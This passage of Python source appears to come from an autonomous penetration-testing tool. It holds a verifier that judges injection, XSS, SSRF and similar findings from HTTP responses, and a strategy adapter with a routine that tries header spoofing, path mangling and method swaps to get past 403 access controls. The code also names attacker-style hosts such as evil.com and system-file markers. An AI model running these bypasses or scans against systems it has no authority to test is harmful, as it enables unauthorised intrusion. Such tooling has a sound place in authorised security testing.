3. Payload effect (reflection, evaluation, file content)
4. New error patterns (present in test but absent in baseline)
Confidence rules:
- 2+ signals → confirmed (skip AI)
- 1 signal + confidence >= 0.8 → confirmed
- 1 signal + confidence < 0.8 → needs AI confirmation
- 0 signals → rejected
"""
def __init__(self):
    """Pre-compile every indicator regex once so per-response checks stay cheap."""
    def _compile(patterns):
        return [re.compile(p, re.IGNORECASE) for p in patterns]

    self._compiled_db_errors = _compile(DB_ERROR_PATTERNS)
    self._compiled_template_errors = _compile(TEMPLATE_ERROR_PATTERNS)
    self._compiled_cmd_markers = _compile(COMMAND_OUTPUT_MARKERS)
    self._compiled_nosql_errors = _compile(NOSQL_ERROR_PATTERNS)
    self._compiled_ldap_errors = _compile(LDAP_ERROR_PATTERNS)
    self._compiled_xpath_errors = _compile(XPATH_ERROR_PATTERNS)
    self._compiled_graphql_errors = _compile(GRAPHQL_ERROR_PATTERNS)
    self._compiled_deser_errors = _compile(DESERIALIZATION_ERROR_PATTERNS)
    self._compiled_el_errors = _compile(EL_INJECTION_PATTERNS)
# ------------------------------------------------------------------
# Target health check
# ------------------------------------------------------------------
async def check_target_health(self, session, url: str) -> Tuple[bool, dict]:
    """
    Verify the target is alive and functional before testing.

    A target is considered unhealthy when it returns 5xx, replies with a
    near-empty body (< 50 chars), or its body contains one of the
    UNHEALTHY_PATTERNS strings (maintenance page, gateway error, ...).

    Args:
        session: aiohttp-style client session (async context-manager .get()).
        url: URL to probe with a single GET (redirects followed, 15s timeout).

    Returns:
        (is_healthy, info_dict) — info_dict carries status/length/server
        details on success, or a "reason" string explaining the failure.
    """
    try:
        async with session.get(url, timeout=15, allow_redirects=True) as resp:
            body = await resp.text()
            status = resp.status
            headers = dict(resp.headers)
            info = {
                "status": status,
                "content_length": len(body),
                "content_type": headers.get("Content-Type", ""),
                "server": headers.get("Server", ""),
            }
            # Reject server errors
            if status >= 500:
                info["reason"] = f"Server error (HTTP {status})"
                return False, info
            # Reject empty/minimal pages
            if len(body) < 50:
                info["reason"] = "Response too short (< 50 chars)"
                return False, info
            # Check for unhealthy content
            body_lower = body.lower()
            for pattern in UNHEALTHY_PATTERNS:
                if pattern in body_lower:
                    info["reason"] = f"Unhealthy response: '{pattern}'"
                    return False, info
            info["healthy"] = True
            return True, info
    except Exception as e:
        # Truncate the exception text so the reason stays log-friendly
        return False, {"reason": f"Connection error: {str(e)[:200]}"}
# ------------------------------------------------------------------
# Baseline diffing
# ------------------------------------------------------------------
def compute_response_diff(self, baseline: dict, test_response: dict) -> dict:
"""
Compare test response against cached baseline.
Returns dict with diff metrics.
"""
baseline_body = baseline.get("body", "")
test_body = test_response.get("body", "")
baseline_len = len(baseline_body) if isinstance(baseline_body, str) else baseline.get("body_length", 0)
test_len = len(test_body)
length_diff = abs(test_len - baseline_len)
length_pct = (length_diff / max(baseline_len, 1)) * 100
baseline_hash = baseline.get("body_hash") or hashlib.md5(
baseline_body.encode("utf-8", errors="replace")
).hexdigest()
test_hash = hashlib.md5(
test_body.encode("utf-8", errors="replace")
).hexdigest()
# Detect new error patterns in test but not baseline
baseline_lower = (baseline_body if isinstance(baseline_body, str) else "").lower()
test_lower = test_body.lower()
new_errors = []
for pat in self._compiled_db_errors:
if pat.search(test_lower) and not pat.search(baseline_lower):
new_errors.append(pat.pattern)
for pat in self._compiled_template_errors:
if pat.search(test_lower) and not pat.search(baseline_lower):
new_errors.append(pat.pattern)
return {
"status_changed": baseline.get("status", 0) != test_response.get("status", 0),
"baseline_status": baseline.get("status", 0),
"test_status": test_response.get("status", 0),
"length_diff": length_diff,
"length_diff_pct": round(length_pct, 1),
"body_hash_changed": baseline_hash != test_hash,
"new_error_patterns": new_errors,
}
# ------------------------------------------------------------------
# Payload effect verification
# ------------------------------------------------------------------
def _check_payload_effect(self, vuln_type: str, payload: str,
                          test_body: str, test_status: int,
                          test_headers: dict,
                          baseline_body: str = "",
                          baseline_status: int = 0) -> Tuple[bool, Optional[str]]:
    """
    Check if the payload produced a detectable effect in the response.
    This is signal #3 in multi-signal verification.
    Weak checks (NoSQL blind, parameter pollution, type juggling,
    HTML injection, JWT, blind XSS, mutation XSS) require baseline
    comparison to eliminate false positives.

    Args:
        vuln_type: Vulnerability type key (registry key or legacy name).
            Exactly one type branch below runs; unknown types fall through
            to the final (False, None).
        payload: The payload string that was sent in the test request.
        test_body: Response body of the payload request.
        test_status: HTTP status code of the payload response.
        test_headers: Response headers; key casing may vary, so lookups
            below try both "Header" and "header" spellings.
        baseline_body: Benign baseline response body ("" when no baseline).
        baseline_status: Benign baseline status (0 when no baseline).

    Returns:
        (effect_found, evidence) — evidence is None when no effect was
        detected.

    NOTE(review): some branches match pre-compiled patterns against the
    lowercased body (db/nosql errors) while others match against the raw
    ``test_body`` (ldap/xpath/el/graphql/deserialization) — presumably those
    patterns are compiled case-insensitively; confirm at their definition.
    """
    body_lower = test_body.lower()
    baseline_lower = baseline_body.lower() if baseline_body else ""
    # ---- XSS ----
    if vuln_type in ("xss", "xss_reflected", "xss_stored", "xss_dom"):
        payload_lower = payload.lower()
        # Unescaped reflection — use context-aware analysis
        if payload in test_body or payload_lower in body_lower:
            # Imported lazily so the analyzer is only loaded when needed.
            from backend.core.xss_context_analyzer import analyze_xss_execution_context
            ctx = analyze_xss_execution_context(test_body, payload)
            if ctx["executable"]:
                return True, f"XSS payload in auto-executing context: {ctx['detail']}"
            if ctx["interactive"]:
                return True, f"XSS payload in interactive context: {ctx['detail']}"
        return False, None
    # ---- SQLi ----
    if vuln_type in ("sqli", "sqli_error", "sqli_union", "sqli_blind", "sqli_time"):
        # Any database error string appearing in the response counts.
        for pat in self._compiled_db_errors:
            m = pat.search(body_lower)
            if m:
                return True, f"SQL error induced by payload: {m.group()}"
        return False, None
    # ---- SSTI ----
    if vuln_type == "ssti":
        # SSTI_EVALUATIONS maps template expressions to their evaluated
        # results (defined elsewhere in this module).
        for expr, result in SSTI_EVALUATIONS.items():
            if expr in payload and result in test_body:
                # Confirm the raw expression is NOT present (evaluated)
                if expr not in test_body:
                    return True, f"Template expression evaluated: {expr}={result}"
        return False, None
    # ---- LFI / Path Traversal ----
    if vuln_type in ("lfi", "path_traversal"):
        for marker in FILE_CONTENT_MARKERS:
            if marker.lower() in body_lower:
                return True, f"File content detected: {marker}"
        return False, None
    # ---- Command Injection / RCE ----
    if vuln_type in ("rce", "command_injection"):
        for pat in self._compiled_cmd_markers:
            m = pat.search(test_body)
            if m:
                return True, f"Command output detected: {m.group()}"
        return False, None
    # ---- SSRF ----
    if vuln_type in ("ssrf", "ssrf_cloud"):
        # Cloud metadata / passwd markers that indicate an internal fetch.
        ssrf_markers = ["ami-id", "instance-type", "iam/info", "meta-data",
                        "computeMetadata", "root:x:0:0"]
        for marker in ssrf_markers:
            if marker.lower() in body_lower:
                return True, f"Internal resource content: {marker}"
        return False, None
    # ---- Open Redirect ----
    if vuln_type == "open_redirect":
        if test_status in (301, 302, 303, 307, 308):
            location = test_headers.get("Location", test_headers.get("location", ""))
            # "//" prefix is a protocol-relative redirect to another host.
            if "evil.com" in location or location.startswith("//"):
                return True, f"Redirect to external: {location}"
        return False, None
    # ---- XXE ----
    if vuln_type == "xxe":
        for marker in FILE_CONTENT_MARKERS:
            if marker.lower() in body_lower:
                return True, f"XXE file read: {marker}"
        return False, None
    # ---- NoSQL Injection ----
    if vuln_type == "nosql_injection":
        for pat in self._compiled_nosql_errors:
            m = pat.search(body_lower)
            if m:
                return True, f"NoSQL error induced: {m.group()}"
        # Boolean-based blind NoSQL: require response DIFFERS from baseline
        if "$gt" in payload or "$ne" in payload or "$regex" in payload:
            if baseline_body and test_status == 200:
                len_diff = abs(len(test_body) - len(baseline_body))
                len_pct = (len_diff / max(len(baseline_body), 1)) * 100
                status_diff = test_status != baseline_status
                if len_pct > 20 or status_diff:
                    return True, f"NoSQL blind: Response differs from baseline (delta {len_diff} chars, {len_pct:.0f}%)"
        return False, None
    # ---- LDAP Injection ----
    if vuln_type == "ldap_injection":
        for pat in self._compiled_ldap_errors:
            m = pat.search(test_body)
            if m:
                return True, f"LDAP error induced: {m.group()}"
        return False, None
    # ---- XPath Injection ----
    if vuln_type == "xpath_injection":
        for pat in self._compiled_xpath_errors:
            m = pat.search(test_body)
            if m:
                return True, f"XPath error induced: {m.group()}"
        return False, None
    # ---- CRLF Injection ----
    if vuln_type == "crlf_injection":
        # Check if injected header appears in response headers
        injected_headers = ["X-Injected", "Set-Cookie", "X-CRLF-Test"]
        for hdr in injected_headers:
            if hdr.lower() in payload.lower():
                header_val = test_headers.get(hdr, test_headers.get(hdr.lower(), ""))
                if header_val and ("injected" in header_val.lower() or "crlf" in header_val.lower()):
                    return True, f"CRLF: Injected header appeared: {hdr}: {header_val[:100]}"
        # Check for header splitting in body
        if "\r\n" in payload and test_status in (200, 302):
            if "x-injected" in body_lower or "set-cookie" in body_lower:
                return True, "CRLF: Injected headers visible in response body"
        return False, None
    # ---- Header Injection ----
    if vuln_type == "header_injection":
        # Similar to CRLF but broader
        if "\r\n" in payload or "%0d%0a" in payload.lower():
            for hdr_name in ["X-Injected", "X-Custom"]:
                if test_headers.get(hdr_name) or test_headers.get(hdr_name.lower()):
                    return True, f"Header injection: {hdr_name} injected via payload"
        return False, None
    # ---- Expression Language Injection ----
    if vuln_type == "expression_language_injection":
        for pat in self._compiled_el_errors:
            m = pat.search(test_body)
            if m:
                return True, f"EL error induced: {m.group()}"
        # Check for EL evaluation (similar to SSTI)
        for expr, result in SSTI_EVALUATIONS.items():
            if expr in payload and result in test_body and expr not in test_body:
                return True, f"EL expression evaluated: {expr}={result}"
        return False, None
    # ---- Log Injection ----
    if vuln_type == "log_injection":
        # Check for injected log line content reflected back
        log_markers = ["INJECTED_LOG_ENTRY", "FAKE_ADMIN_LOGIN", "log-injection-test"]
        for marker in log_markers:
            if marker in payload and marker in test_body:
                return True, f"Log injection: Marker '{marker}' reflected in response"
        return False, None
    # ---- HTML Injection ----
    if vuln_type == "html_injection":
        payload_lower = payload.lower()
        # Check for unescaped HTML tags reflected
        html_tags = ["<h1", "<div", "<marquee", "<b>", "<u>", "<font", "<form"]
        for tag in html_tags:
            if tag in payload_lower and tag in body_lower:
                # Verify not HTML-encoded
                escaped = tag.replace("<", "&lt;")
                if escaped not in body_lower:
                    # Require tag is NOT already present in baseline (pre-existing)
                    if baseline_lower and tag in baseline_lower:
                        continue  # Tag exists in baseline — not injected
                    return True, f"HTML injection: Tag {tag} reflected unescaped (not in baseline)"
        return False, None
    # ---- CSV Injection ----
    if vuln_type == "csv_injection":
        csv_prefixes = ["=CMD", "=HYPERLINK", "+CMD", "-CMD", "@SUM"]
        content_type = test_headers.get("Content-Type", test_headers.get("content-type", ""))
        # Only meaningful when the response actually serves CSV/spreadsheet data.
        if "csv" in content_type.lower() or "spreadsheet" in content_type.lower():
            for prefix in csv_prefixes:
                if prefix in payload and prefix in test_body:
                    return True, f"CSV injection: Formula '{prefix}' in CSV output"
        return False, None
    # ---- GraphQL Injection ----
    if vuln_type == "graphql_injection":
        for pat in self._compiled_graphql_errors:
            m = pat.search(test_body)
            if m:
                return True, f"GraphQL error: {m.group()}"
        return False, None
    # ---- ORM Injection ----
    if vuln_type == "orm_injection":
        # Framework-specific error signatures compiled on the fly
        # (not hot enough to justify pre-compilation).
        orm_errors = [
            r"hibernate.*exception", r"sequelize.*error", r"typeorm.*error",
            r"ActiveRecord.*(?:Statement)?Invalid", r"django\.db.*error",
            r"prisma.*error", r"sqlalchemy.*error",
        ]
        for pat_str in orm_errors:
            if re.search(pat_str, test_body, re.IGNORECASE):
                return True, f"ORM error induced: {pat_str}"
        return False, None
    # ---- Blind XSS ----
    if vuln_type == "blind_xss":
        # Blind XSS payloads typically use external callbacks
        # We can only detect if the payload was stored (reflected later)
        if payload.lower() in body_lower:
            if "src=" in payload.lower() or "onerror=" in payload.lower():
                # Require payload NOT already in baseline
                if baseline_lower and payload.lower() in baseline_lower:
                    return False, None
                return True, "Blind XSS payload stored in response"
        return False, None
    # ---- Mutation XSS ----
    if vuln_type == "mutation_xss":
        # mXSS exploits browser HTML parsing mutations
        mxss_markers = ["<svg", "<math", "<xmp", "<noembed", "<listing"]
        for marker in mxss_markers:
            if marker in payload.lower() and marker in body_lower:
                # Require element NOT already in baseline
                if baseline_lower and marker in baseline_lower:
                    continue
                return True, f"Mutation XSS: Mutatable element {marker} reflected (not in baseline)"
        return False, None
    # ---- RFI ----
    if vuln_type == "rfi":
        # Raw server-side source markers leaking into the response.
        rfi_indicators = ["<?php", "<%", "#!/", "import os"]
        for indicator in rfi_indicators:
            if indicator.lower() in body_lower:
                return True, f"RFI: Remote file content marker: {indicator}"
        return False, None
    # ---- File Upload ----
    if vuln_type == "file_upload":
        upload_success = [
            r"(?:file|upload).*(?:success|saved|stored|created)",
            r"(?:uploaded|saved) to.*(?:\/|\\)",
        ]
        for pat_str in upload_success:
            if re.search(pat_str, body_lower):
                return True, f"File upload succeeded: {pat_str}"
        return False, None
    # ---- Arbitrary File Read ----
    if vuln_type == "arbitrary_file_read":
        for marker in FILE_CONTENT_MARKERS:
            if marker.lower() in body_lower:
                return True, f"Arbitrary file read: {marker}"
        return False, None
    # ---- Arbitrary File Delete ----
    if vuln_type == "arbitrary_file_delete":
        delete_indicators = [
            r"(?:file|resource).*(?:deleted|removed|not found after)",
            r"successfully.*(?:deleted|removed)",
        ]
        for pat_str in delete_indicators:
            if re.search(pat_str, body_lower):
                return True, f"File delete confirmed: {pat_str}"
        return False, None
    # ---- Zip Slip ----
    if vuln_type == "zip_slip":
        zip_indicators = [
            r"extracted to.*/\.\./",
            r"path traversal.*(?:zip|archive)",
        ]
        for pat_str in zip_indicators:
            if re.search(pat_str, body_lower):
                return True, f"Zip slip: {pat_str}"
        # Fallback: file-content markers imply a traversal overwrite/read.
        for marker in FILE_CONTENT_MARKERS:
            if marker.lower() in body_lower:
                return True, f"Zip slip - file overwrite evidence: {marker}"
        return False, None
    # ---- JWT Manipulation ----
    if vuln_type == "jwt_manipulation":
        # Tampered JWT accepted — require auth markers NOT in baseline
        if test_status == 200 and ("alg" in payload.lower() or "none" in payload.lower()):
            jwt_auth_markers = ["authorized", "welcome", "admin"]
            for marker in jwt_auth_markers:
                if marker in body_lower:
                    # If baseline also has this marker, it's normal behavior
                    if baseline_lower and marker in baseline_lower:
                        continue
                    return True, f"JWT manipulation: Tampered token granted access ({marker} not in baseline)"
        return False, None
    # ---- Prototype Pollution ----
    if vuln_type == "prototype_pollution":
        if "__proto__" in payload or "constructor" in payload:
            pollution_markers = ["polluted", "__proto__", "isAdmin", "true"]
            # Require at least two markers — a single hit (e.g. "true") is
            # too common to be conclusive.
            match_count = sum(1 for m in pollution_markers if m.lower() in body_lower)
            if match_count >= 2:
                return True, "Prototype pollution: Injected properties reflected"
        return False, None
    # ---- Host Header Injection ----
    if vuln_type == "host_header_injection":
        # Check if injected host is reflected in response
        evil_hosts = ["evil.com", "attacker.com", "injected.host"]
        for host in evil_hosts:
            if host in payload and host in body_lower:
                return True, f"Host header injection: {host} reflected in response"
        # Password reset poisoning
        if "evil.com" in payload:
            if "reset" in body_lower or "password" in body_lower:
                if "evil.com" in body_lower:
                    return True, "Host header injection: Evil host in password reset link"
        return False, None
    # ---- HTTP Smuggling ----
    if vuln_type == "http_smuggling":
        smuggling_indicators = [
            test_status == 400 and "transfer-encoding" in payload.lower(),
            "unrecognized transfer-coding" in body_lower,
            "request smuggling" in body_lower,
        ]
        if any(smuggling_indicators):
            return True, "HTTP smuggling: Desync indicators detected"
        return False, None
    # ---- Cache Poisoning ----
    if vuln_type == "cache_poisoning":
        # Check if injected value appears in cached response
        cache_headers = ["X-Cache", "CF-Cache-Status", "Age", "X-Cache-Hit"]
        is_cached = any(
            test_headers.get(h, test_headers.get(h.lower(), ""))
            for h in cache_headers
        )
        if is_cached and payload.lower() in body_lower:
            return True, "Cache poisoning: Payload reflected in cached response"
        return False, None
    # ---- Insecure Deserialization ----
    if vuln_type == "insecure_deserialization":
        for pat in self._compiled_deser_errors:
            m = pat.search(test_body)
            if m:
                return True, f"Deserialization error: {m.group()}"
        # Check for command execution via deser
        for pat in self._compiled_cmd_markers:
            m = pat.search(test_body)
            if m:
                return True, f"Deserialization RCE: {m.group()}"
        return False, None
    # ---- Parameter Pollution ----
    if vuln_type == "parameter_pollution":
        # HPP only confirmed if response DIFFERS significantly from baseline
        if "&" in payload and baseline_body:
            len_diff = abs(len(test_body) - len(baseline_body))
            len_pct = (len_diff / max(len(baseline_body), 1)) * 100
            status_diff = test_status != baseline_status
            if len_pct > 20 or status_diff:
                return True, f"Parameter pollution: Response differs from baseline (delta {len_diff} chars, {len_pct:.0f}%)"
        return False, None
    # ---- Type Juggling ----
    if vuln_type == "type_juggling":
        if test_status == 200:
            if "0" in payload or "true" in payload.lower() or "[]" in payload:
                auth_markers = ["authenticated", "authorized", "welcome", "admin", "success"]
                for marker in auth_markers:
                    if marker in body_lower:
                        # Require marker NOT in baseline — otherwise it's normal behavior
                        if baseline_lower and marker in baseline_lower:
                            continue
                        return True, f"Type juggling: Auth bypass ({marker} appears only with juggled type)"
        return False, None
    # ---- SOAP Injection ----
    if vuln_type == "soap_injection":
        soap_errors = [
            r"soap.*(?:fault|error|exception)",
            r"xml.*(?:parse|syntax).*error",
            r"<faultcode>",
            r"<faultstring>",
        ]
        for pat_str in soap_errors:
            if re.search(pat_str, body_lower):
                return True, f"SOAP injection: {pat_str}"
        return False, None
    # ---- Subdomain Takeover ----
    if vuln_type == "subdomain_takeover":
        # Canonical "unclaimed resource" banners of common hosting providers.
        takeover_markers = [
            "there isn't a github pages site here",
            "herokucdn.com/error-pages",
            "the request could not be satisfied",
            "no such app",
            "project not found",
            "this page is parked free",
            "does not exist in the app platform",
            "NoSuchBucket",
        ]
        for marker in takeover_markers:
            if marker.lower() in body_lower:
                return True, f"Subdomain takeover: {marker}"
        return False, None
    # Unknown vuln type — no effect check available.
    return False, None
# ------------------------------------------------------------------
# Multi-signal verification (core method)
# ------------------------------------------------------------------
def multi_signal_verify(
    self,
    vuln_type: str,
    payload: str,
    test_response: dict,
    baseline: Optional[dict],
    tester_result: Tuple[bool, float, Optional[str]],
) -> Tuple[bool, str, int]:
    """
    Decide whether a vulnerability is confirmed by aggregating up to
    four independent signals: tester pattern match, baseline response
    diff, newly-appearing error patterns, and payload effect.

    Args:
        vuln_type: Vulnerability type (registry key or legacy name)
        payload: The payload used
        test_response: The HTTP response from the payload test
        baseline: Cached baseline response (can be None)
        tester_result: (is_vuln, confidence, evidence) from VulnEngine tester
    Returns:
        (is_confirmed, evidence_summary, signal_count)
    """
    collected: List[str] = []
    notes: List[str] = []
    top_conf = 0.0
    body = test_response.get("body", "")
    status = test_response.get("status", 0)
    headers = test_response.get("headers", {})

    # Signal 1: the VulnEngine tester's own pattern match.
    is_vuln, conf, tester_evidence = tester_result
    if is_vuln and conf >= 0.7:
        collected.append("tester_match")
        notes.append(tester_evidence or "Pattern match")
        top_conf = max(top_conf, conf)

    # Signal 2: significant diff between baseline and test responses,
    # with per-type thresholds for what "significant" means.
    if baseline:
        diff = self.compute_response_diff(baseline, test_response)
        if vuln_type in ("sqli", "sqli_error", "sqli_blind"):
            big_change = diff["length_diff"] > 300 and diff["status_changed"]
        elif vuln_type in ("lfi", "path_traversal", "xxe"):
            big_change = diff["length_diff_pct"] > 50
        elif vuln_type in ("ssti", "command_injection", "rce"):
            big_change = diff["body_hash_changed"] and diff["length_diff"] > 100
        else:
            big_change = diff["status_changed"] and diff["length_diff"] > 500
        if big_change:
            collected.append("baseline_diff")
            notes.append(
                f"Response diff: status {diff['baseline_status']}->{diff['test_status']}, "
                f"length delta {diff['length_diff']} ({diff['length_diff_pct']}%)"
            )
        # Error patterns absent from the baseline count as their own signal.
        if diff["new_error_patterns"]:
            collected.append("new_errors")
            notes.append(
                f"New error patterns: {', '.join(diff['new_error_patterns'][:3])}"
            )

    # Signal 3: type-specific payload effect check.
    base_body = baseline.get("body", "") if baseline else ""
    base_status = baseline.get("status", 0) if baseline else 0
    hit, hit_evidence = self._check_payload_effect(
        vuln_type, payload, body, status, headers,
        baseline_body=base_body, baseline_status=base_status
    )
    if hit:
        collected.append("payload_effect")
        notes.append(hit_evidence)

    # Verdict: 2+ signals confirm outright; a single high-confidence
    # signal confirms; a single weak signal is handed back with evidence
    # so the caller may escalate to AI review; zero signals reject.
    count = len(collected)
    summary = " | ".join(notes) if notes else ""
    if count >= 2:
        return True, summary, count
    if count == 1 and top_conf >= 0.8:
        return True, summary, count
    if count == 1:
        return False, summary, count
    return False, "", 0
+438
View File
@@ -0,0 +1,438 @@
"""
NeuroSploit v3 - Strategy Adapter
Mid-scan strategy adaptation: signal tracking, 403 bypass attempts,
diminishing returns detection, endpoint health monitoring, and
dynamic reprioritization for autonomous pentesting.
"""
import asyncio
import logging
import time
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Callable
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
@dataclass
class EndpointHealth:
    """Health tracking for a single endpoint.

    One instance per normalized URL (scheme://host/path, query stripped
    by StrategyAdapter._get_endpoint). All counters are updated from
    StrategyAdapter.record_test_result.
    """
    url: str  # Normalized endpoint URL used as the tracking key.
    total_tests: int = 0  # Total vulnerability tests sent to this endpoint.
    consecutive_failures: int = 0  # Back-to-back blocked/errored tests; reset on any finding or normal response.
    status_403_count: int = 0  # How many 403 responses were observed.
    status_429_count: int = 0  # How many 429 (rate-limit) responses were observed.
    timeout_count: int = 0  # Timeouts and connection errors.
    findings_count: int = 0  # Confirmed findings attributed to this endpoint.
    is_dead: bool = False  # Set once consecutive_failures reaches the dead threshold.
    waf_detected: bool = False  # Presumably set by WAF detection elsewhere — not written in this module.
    avg_response_time: float = 0.0  # Rolling mean (seconds) over recent samples.
    _response_times: list = field(default_factory=list)  # Recent duration samples backing avg_response_time.
    tested_types: set = field(default_factory=set)  # Vuln types already attempted on this endpoint.
    last_test_time: float = 0.0  # time.time() of the most recent test.
@dataclass
class VulnTypeStats:
    """Tracking stats per vulnerability type (aggregated across endpoints)."""
    vuln_type: str  # Vulnerability type key this record aggregates.
    total_tests: int = 0  # Tests attempted for this type.
    confirmed_count: int = 0  # Tests that yielded a confirmed finding.
    rejected_count: int = 0  # Tests that did not confirm.
    waf_block_count: int = 0  # 403s attributed to WAF blocking for this type.
    success_rate: float = 0.0  # confirmed_count / total_tests (0 when untested).
    avg_confidence: float = 0.0  # Rolling mean of recent confidence scores.
    _confidences: list = field(default_factory=list)  # Recent confidence samples backing avg_confidence.
class BypassTechniques:
    """403 Forbidden bypass with 15+ techniques.

    Three phases are tried in order — header spoofing, path mangling,
    and HTTP method substitution — and the first response that no longer
    looks blocked wins.
    """
    # Headers some reverse proxies / ACLs trust for origin or routing.
    # "{path}" placeholders are filled with the original request path.
    HEADER_BYPASSES = [
        {"X-Original-URL": "{path}"},
        {"X-Rewrite-URL": "{path}"},
        {"X-Forwarded-For": "127.0.0.1"},
        {"X-Forwarded-Host": "localhost"},
        {"X-Custom-IP-Authorization": "127.0.0.1"},
        {"X-Real-IP": "127.0.0.1"},
        {"X-Originating-IP": "127.0.0.1"},
        {"X-Remote-IP": "127.0.0.1"},
        {"X-Client-IP": "127.0.0.1"},
        {"X-Host": "localhost"},
    ]
    # Path mutations. Placeholders: {path} keeps the leading slash,
    # {path_no_slash} has it stripped, {path_upper} is path.upper().
    # Fixes vs. the original list: "{path}..;/" duplicated
    # "/{path_no_slash}..;/" (identical URL for any "/"-prefixed path,
    # wasting a request), and "/{path_upper}" produced "//ADMIN" instead
    # of the intended "/ADMIN".
    PATH_BYPASSES = [
        "{path}/.",              # /admin/.
        "{path}/./",             # /admin/./
        "/{path}//",             # //admin//
        "{path}%20",             # /admin%20
        "{path}%00",             # /admin%00 (null byte)
        "{path}?",               # /admin?
        "{path}???",             # /admin???
        "{path}#",               # /admin#
        "/%2e/{path_no_slash}",  # /%2e/admin
        "/{path_no_slash};/",    # /admin;/
        "/{path_no_slash}..;/",  # /admin..;/
        "{path_upper}",          # /ADMIN
    ]
    METHOD_BYPASSES = ["OPTIONS", "PUT", "PATCH", "TRACE", "HEAD"]

    @classmethod
    async def attempt_bypass(
        cls,
        request_engine,
        url: str,
        original_method: str = "GET",
        original_response: Optional[Dict] = None,
    ) -> Optional[Dict]:
        """Try bypass techniques on a 403'd URL.

        Args:
            request_engine: Async HTTP client exposing
                ``request(url, method=..., headers=...)`` returning an
                object with ``status``, ``body`` and ``headers``.
            url: The URL that was blocked.
            original_method: HTTP method of the blocked request.
            original_response: Reserved for diffing against the blocked
                response; currently unused.

        Returns the first successful bypass response (dict with status,
        body, headers and bypass_method), or None.
        """
        parsed = urlparse(url)
        path = parsed.path
        path_no_slash = path.lstrip("/")
        path_upper = path.upper()
        base_url = f"{parsed.scheme}://{parsed.netloc}"
        # Phase 1: Header bypasses — only 403/401/0 still count as blocked.
        for header_set in cls.HEADER_BYPASSES:
            try:
                headers = {}
                for k, v in header_set.items():
                    headers[k] = v.format(path=path)
                result = await request_engine.request(
                    url, method=original_method, headers=headers
                )
                if result and result.status not in (403, 401, 0):
                    logger.info(f"403 bypass via header {list(header_set.keys())[0]}: {url}")
                    return {
                        "status": result.status,
                        "body": result.body,
                        "headers": result.headers,
                        "bypass_method": f"header:{list(header_set.keys())[0]}",
                    }
            except Exception:
                continue
        # Phase 2: Path bypasses — mutated paths can legitimately 404,
        # so 404 is also treated as "not bypassed" in this phase.
        for path_tmpl in cls.PATH_BYPASSES:
            try:
                new_path = path_tmpl.format(
                    path=path, path_no_slash=path_no_slash, path_upper=path_upper
                )
                bypass_url = f"{base_url}{new_path}"
                if parsed.query:
                    bypass_url += f"?{parsed.query}"
                result = await request_engine.request(
                    bypass_url, method=original_method
                )
                if result and result.status not in (403, 401, 404, 0):
                    logger.info(f"403 bypass via path '{new_path}': {url}")
                    return {
                        "status": result.status,
                        "body": result.body,
                        "headers": result.headers,
                        "bypass_method": f"path:{new_path}",
                    }
            except Exception:
                continue
        # Phase 3: Method bypasses — 405 means the method itself was
        # rejected, which is not a bypass.
        for method in cls.METHOD_BYPASSES:
            if method == original_method:
                continue
            try:
                result = await request_engine.request(url, method=method)
                if result and result.status not in (403, 401, 405, 0):
                    logger.info(f"403 bypass via method {method}: {url}")
                    return {
                        "status": result.status,
                        "body": result.body,
                        "headers": result.headers,
                        "bypass_method": f"method:{method}",
                    }
            except Exception:
                continue
        return None
class StrategyAdapter:
    """Mid-scan strategy adaptation engine.
    Monitors endpoint health, vuln type success rates, and global signals
    to dynamically adjust testing strategy.
    Features:
    - Dead endpoint detection (skip after N consecutive failures)
    - Hot endpoint promotion (more testing on productive endpoints)
    - 403 bypass (15+ techniques via BypassTechniques)
    - Diminishing returns (stop testing unproductive type+endpoint combos)
    - Dynamic rate limiting adjustment
    - Priority recomputation every N tests
    - Global statistics and reporting
    """
    # Tuning knobs (class attributes so subclasses/tests can override them).
    DEAD_ENDPOINT_THRESHOLD = 3  # Consecutive failures before marking dead
    DIMINISHING_RETURNS_THRESHOLD = 10  # Max failed payloads before skipping type
    ADAPTATION_INTERVAL = 50  # Tests between priority recomputations
    MAX_403_BYPASS_PER_URL = 2  # Max bypass attempts per URL
    HOT_ENDPOINT_THRESHOLD = 2  # Findings to mark endpoint as "hot"

    def __init__(self, memory=None):
        """Create an adapter with empty tracking state.

        Args:
            memory: Optional external memory object; stored but not used
                within this class.
        """
        self.memory = memory
        self._endpoints: Dict[str, EndpointHealth] = {}  # normalized url -> health
        self._vuln_stats: Dict[str, VulnTypeStats] = {}  # vuln type -> stats
        self._global_test_count = 0
        self._global_finding_count = 0
        self._last_adaptation_time = time.time()
        self._last_adaptation_count = 0
        self._403_bypass_attempts: Dict[str, int] = {}  # url -> attempt count
        self._bypass_successes: List[Dict] = []  # successful bypass records for reporting
        self._hot_endpoints: set = set()  # normalized urls with multiple findings
        self._rate_limit_detected = False  # latched true on the first 429 seen
        self._global_delay = 0.1  # baseline inter-request delay in seconds

    def _get_endpoint(self, url: str) -> EndpointHealth:
        """Get or create endpoint health tracker."""
        # Normalize URL (strip query params for grouping)
        parsed = urlparse(url)
        key = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
        if key not in self._endpoints:
            self._endpoints[key] = EndpointHealth(url=key)
        return self._endpoints[key]

    def _get_vuln_stats(self, vuln_type: str) -> VulnTypeStats:
        """Get or create vuln type stats tracker."""
        if vuln_type not in self._vuln_stats:
            self._vuln_stats[vuln_type] = VulnTypeStats(vuln_type=vuln_type)
        return self._vuln_stats[vuln_type]

    def record_test_result(
        self,
        url: str,
        vuln_type: str,
        status: int,
        was_confirmed: bool,
        confidence: int = 0,
        duration: float = 0.0,
        error_type: str = "success",
    ) -> None:
        """Record the result of a vulnerability test.
        Called after each test attempt to update all tracking state.

        Args:
            url: Tested URL (normalized internally).
            vuln_type: Vulnerability type that was tested.
            status: HTTP status of the test response (0 = no response).
            was_confirmed: Whether the test produced a confirmed finding.
            confidence: Confidence score of the result (0 = not scored).
            duration: Request duration in seconds (0 = unknown).
            error_type: "success", "timeout", "connection_error",
                "waf_blocked", etc.
        """
        ep = self._get_endpoint(url)
        vs = self._get_vuln_stats(vuln_type)
        self._global_test_count += 1
        # Update endpoint health
        ep.total_tests += 1
        ep.last_test_time = time.time()
        ep.tested_types.add(vuln_type)
        if duration > 0:
            ep._response_times.append(duration)
            # Keep the sample window bounded (trim 30 -> last 20).
            if len(ep._response_times) > 30:
                ep._response_times = ep._response_times[-20:]
            ep.avg_response_time = sum(ep._response_times) / len(ep._response_times)
        if status == 403:
            ep.status_403_count += 1
        elif status == 429:
            ep.status_429_count += 1
